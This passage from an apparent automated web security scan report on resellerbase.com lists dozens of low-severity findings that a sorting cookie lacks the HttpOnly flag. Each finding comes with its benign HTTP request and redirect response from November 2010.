Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/singels
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.96. http://www.resellerbase.com/tag/software previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/software

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/software HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/software
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/software
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.97. http://www.resellerbase.com/tag/telephone previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/telephone

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/telephone HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/telephone
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/telephone
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.98. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.99. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.100. http://www.resellerbase.com/tag/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:59:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.101. http://www.resellerbase.com/tag/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:59:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.102. http://www.resellerbase.com/tag/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:59:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.103. http://www.resellerbase.com/tag/travel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/travel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/travel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/travel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/travel
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.104. http://www.resellerbase.com/tag/uk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/uk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/uk HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/uk
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/uk
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.105. http://www.resellerbase.com/tag/vaccation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/vaccation

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/vaccation HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/vaccation
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/vaccation
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.106. http://www.resellerbase.com/tag/video previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/video

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/video HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/video
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/video
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.107. http://www.resellerbase.com/tag/web+cam previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+cam

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/web+cam HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:57:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/web+cam
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.108. http://www.resellerbase.com/tag/web+hosting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/web+hosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:53:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/web+hosting
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.109. http://www.resellerbase.com/tag/webcam previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/webcam

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/webcam HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/webcam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/webcam
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.110. http://www.resellerbase.com/tag/white+label previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/white+label

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/white+label HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/white+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:57:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/white+label
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.111. http://www.resellerbase.com/travel-vaccation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /travel-vaccation/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:41:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /travel-vaccation/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.112. http://www.resellerbase.com/travel-vaccation/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /travel-vaccation/search.php?cat=12&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/search.php?cat=12&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:42:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /travel-vaccation/search.php?cat=12&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.113. http://www.resellerbase.com/web-service/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:42:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.114. http://www.resellerbase.com/web-service/domain-names/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/domain-names/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:45:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/domain-names/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.115. http://www.resellerbase.com/web-service/domain-names/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/domain-names/search.php?cat=1&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/search.php?cat=1&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:46:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/domain-names/search.php?cat=1&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.116. http://www.resellerbase.com/web-service/other/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/other/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:42:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/other/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.117. http://www.resellerbase.com/web-service/other/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/other/search.php?cat=18&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/search.php?cat=18&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:43:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/other/search.php?cat=18&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.118. http://www.resellerbase.com/web-service/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:49:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.119. http://www.resellerbase.com/web-service/software-scripts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/

Issue detail

